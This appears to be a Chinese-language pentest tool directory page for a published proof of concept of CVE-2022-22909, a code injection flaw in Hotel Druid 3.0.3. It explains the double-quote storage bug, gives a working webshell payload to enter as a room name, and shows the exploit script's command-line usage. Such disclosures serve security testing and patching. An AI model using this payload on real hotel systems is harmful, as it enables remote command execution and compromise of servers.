Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3 代码注入到远程代码执行 | Kitploit
工具/GitHubGitHub/0z09e/cve-2022-22909
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 代码注入到远程代码执行

查看仓库
553年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-22909

描述

已在 Hotel Druid v3.0.3 应用程序中发现一个代码注入漏洞,攻击者可利用该漏洞在服务器上执行远程代码。 成功利用此漏洞的前提是,攻击者必须拥有添加新客房的权限。

漏洞描述

该漏洞的产生原因是客房名称被存储到名为 /dati/selectappartamenti.php 的文件中,且使用了双引号。

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

要成功利用该漏洞,请添加一个客房,并将以下 Payload 作为客房名称。

root@kitploit:~
{${system($_REQUEST[cmd])}}

添加新客房后,访问 /dati/selectappartamenti.php,并通过 cmd 参数传递命令来触发 webshell。

用法

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

示例

如果应用程序没有身份验证,请使用 --noauth 标志执行无需身份验证的操作。

如果服务器启用了身份验证,请使用 --username 和 --password 进行身份验证。

致谢

研究人员及PoC编写者 - 0z09e


下载工具